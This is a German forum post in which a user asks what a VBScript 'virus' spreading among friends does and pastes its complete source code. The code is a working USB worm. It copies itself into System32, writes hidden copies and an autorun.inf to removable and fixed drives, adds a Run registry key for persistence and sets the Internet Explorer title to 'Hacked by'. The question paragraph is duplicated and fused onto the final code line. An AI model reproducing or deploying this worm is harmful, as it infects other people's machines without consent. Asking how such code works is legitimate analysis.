Hallo, unter einigen Bekannten kursiert der folgende Virus (ein VBScript).
Das Teil richtet ja offenbar nicht wirklich Schaden an, trotzdem würde mich interessieren, was er macht.
Ich kann nicht gut programmieren, und VBScript schon gar nicht, habe mir aber folgenden Reim drauf gemacht:
- Kopiert sich von System auf Flashdrive und von Flashdrive auf System bzw. richtet sich dort in der Registry ein.
- Manipuliert die Registry dahingehend, dass in der IE Toolbar der "hacked by"- Text angezeigt wird.
- Nenn sich selbst immer nach dem Computernamen des aktuellen Systems.
Nur aus Interesse würde mich interessieren, ob und was noch etwas anderes passiert, kann mir jemand auf die Sprünge helfen?
Code:
'Mutation of Trojan virus.
'My name is AFFNWERGL.vbs
On error resume next
Dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd,oldname,newname,rgname
Set fs = createobject("Scripting.FileSystemObject")
Set wn = WScript.CreateObject("WScript.Network")
Set mf = fs.getfile(Wscript.ScriptFullname)
oldname=CStr(fs.getfilename(Wscript.ScriptFullname))
newname = wn.ComputerName & ".vbs"
rgname = Replace(newname,".vbs","")
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe AFFNWERGL.vbs"
dim text,size
size = mf.size
check = mf.drive.drivetype
Set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
Loop
mysource=Replace(mysource,oldname,newname)
do
Set winpath = fs.getspecialfolder(0)
Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
tf.attributes = 32
Set tf=fs.createtextfile(winpath & "\SYSTEM32\" & newname,2,true)
tf.write mysource
tf.close
Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
tf.attributes = 39
For each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" Then
Set tf=fs.getfile(flashdrive.path &"\AFFNWERGL.vbs")
tf.attributes =32
Set tf=fs.createtextfile(flashdrive.path &"\AFFNWERGL.vbs",2,true)
tf.write mysource
tf.close
Set tf=fs.getfile(flashdrive.path &"\AFFNWERGL.vbs")
tf.attributes =39
Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
Set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
End If
next
Set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & rgname & "",winpath&"\SYSTEM32\" & newname
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by " & Replace(oldname, ".vbs","")
if check <> 1 then
Wscript.sleep 120000
End if
loop while check<>1
Set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullnameDas Teil richtet ja offenbar nicht wirklich Schaden an, trotzdem würde mich interessieren, was er macht.
Ich kann nicht gut programmieren, und VBScript schon gar nicht, habe mir aber folgenden Reim drauf gemacht:
- Kopiert sich von System auf Flashdrive und von Flashdrive auf System bzw. richtet sich dort in der Registry ein.
- Manipuliert die Registry dahingehend, dass in der IE Toolbar der "hacked by"- Text angezeigt wird.
- Nenn sich selbst immer nach dem Computernamen des aktuellen Systems.
Nur aus Interesse würde mich interessieren, ob und was noch etwas anderes passiert, kann mir jemand auf die Sprünge helfen?
ergo ohne e.
